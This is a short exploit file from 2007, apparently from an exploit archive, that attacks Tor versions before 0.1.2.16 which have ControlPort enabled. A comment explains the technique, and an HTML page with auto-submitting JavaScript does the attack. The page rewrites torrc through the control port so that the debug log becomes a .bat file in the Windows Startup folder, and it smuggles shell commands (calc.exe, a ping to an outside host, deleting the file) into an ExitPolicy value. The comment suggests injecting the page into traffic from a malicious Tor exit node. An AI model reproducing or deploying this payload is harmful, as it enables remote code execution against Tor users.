tor01216-rewrite.txt
Posted on 30 September 2007
<!-- Tor < 0.1.2.16 with ControlPort enabled ( not default ) Exploit for Tor ControlPort "torrc" Rewrite Vulnerability http://secunia.com/advisories/26301 Rewrites the torrc to log to a different location: C:Documents and SettingsAll UsersStart MenuProgramsStartup .bat Also enables debug logging, and an erroneous ExitPolicy looking something like this: reject*:1337'&' calc.exe this will output: [debug] parse_addr_policy(): Adding new entry 'reject*:1337'& calc.exe to the debug log -> t.bat which will run calc.exe on next boot. This is not very silent though, t.bat will contain something like 45 rows of crap which the user will see in about 1 sec, drop me a mail if you have a better way. Either have a TOR user visit this HTML or inject it into her traffic when you're a TOR exit. If you inject, just replace </HEAD> with everything in <HEAD> + </HEAD> ( that's why I tried to fit everything inside <HEAD />), and fix Content-Length // elgCrew _AT_ safe-mail.net --> <html> <head> <script language="javascript"> window.onload = function() { cmd = 'cls & echo off & ping -l 1329 my.tcpdump.co -n 1 -w 1 > NUL & del t.bat > NUL & exit'; inject = ' AUTHENTICATE SETCONF Log="debug-debug file C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\t.bat" SAVECONF SIGNAL RELOAD SETCONF ExitPolicy="reject*:1337\'&' + cmd + '&" SETCONF Log="info file c:\\tor.txt" SAVECONF SIGNAL RELOAD '; form51.area51.value = inject; document.form51.submit(); } </script> <form target="hiddenframe" name="form51" action="http://localhost.mil.se:9051" method=POST enctype="multipart/form-data"> <input type=hidden name=area51> </form> <iframe width=0 height=0 frameborder=0 name="hiddenframe"></iframe> </head> <body> <pre> ---- | y0! | ---- \_\_ _/_/ (oo)\_______ |_| )* ||----w | || || </pre> </body> </html>